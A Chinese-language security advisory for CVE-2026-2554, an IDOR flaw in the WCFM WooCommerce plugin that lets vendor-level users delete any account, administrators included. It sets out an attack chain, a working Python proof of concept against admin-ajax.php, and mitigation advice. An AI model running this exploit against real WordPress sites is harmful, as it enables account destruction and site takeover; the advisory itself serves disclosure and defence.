CVE-2026-2554 CVSS 8.1 高危

CVE-2026-2554 WordPress WCFM插件IDOR漏洞

披露日期: 2026-05-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-2554

漏洞类型

不安全的直接对象引用 (IDOR)

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WCFM – Frontend Manager for WooCommerce

漏洞概述

WordPress插件WCFM – Frontend Manager for WooCommerce在6.7.25及以下版本中存在不安全的直接对象引用（IDOR）漏洞。由于'wcfm_delete_wcfm_customer'函数缺少对用户控制的'customerid'参数的验证，拥有供应商级及以上权限的认证攻击者可以发送恶意请求，利用该漏洞删除任意用户账户，包括管理员账户，导致严重的权限提升和拒绝服务风险。

技术细节

该漏洞源于插件在处理删除用户请求时未实施充分的访问控制检查。具体而言，漏洞点位于wcfm_delete_wcfm_customer回调函数中。当攻击者发送包含customerid参数的请求时，系统直接使用该参数执行删除操作，而未验证当前用户是否有权操作目标ID对应的用户对象。攻击者只需具备供应商级别的较低权限，即可通过遍历用户ID（如修改POST或GET请求中的customerid值）来定位并删除系统中的任何用户。由于WordPress管理员账户被删除后难以恢复，此漏洞可导致系统完全失控。

攻击链分析

STEP 1

步骤1

攻击者注册或获取一个具有Vendor（供应商）级别或更高权限的WordPress账户。

STEP 2

步骤2

攻击者向WordPress的admin-ajax.php接口发送POST请求，参数action设置为wcfm_delete_wcfm_customer，并将customerid设置为目标管理员ID（如1）。

STEP 3

步骤3

服务器接收请求，由于缺少权限验证，直接执行删除操作，将目标用户移除。

STEP 4

步骤4

目标管理员账户被删除，攻击者可能进一步接管网站或造成服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_delete_user(target_url, attacker_cookie, target_user_id):
    """
    Exploit for CVE-2026-2554 IDOR vulnerability.
    Deletes a user by ID using a low-privilege vendor account.
    """
    # The endpoint is typically wp-admin/admin-ajax.php
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Payload data
    data = {
        'action': 'wcfm_delete_wcfm_customer',
        'customerid': target_user_id
    }
    
    # Headers and Cookies
    headers = {
        'User-Agent': 'Mozilla/5.0',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    cookies = {
        'wordpress_logged_in_xxx': attacker_cookie # Replace with actual cookie
    }
    
    try:
        response = requests.post(endpoint, data=data, headers=headers, cookies=cookies)
        if response.status_code == 200:
            print(f"[+] Request sent to delete user ID: {target_user_id}")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Failed to send request. Status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

# Example usage
# exploit_delete_user('http://target-site.com', 'attacker_cookie_value', '1')

影响范围

WCFM – Frontend Manager for WooCommerce <= 6.7.25

防御指南

临时缓解措施

建议立即将插件升级至最新版本以修复漏洞。在未升级前，可暂时禁用WCFM插件的客户管理功能，或通过服务器端规则拦截对wcfm_delete_wcfm_customer接口的非管理员调用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表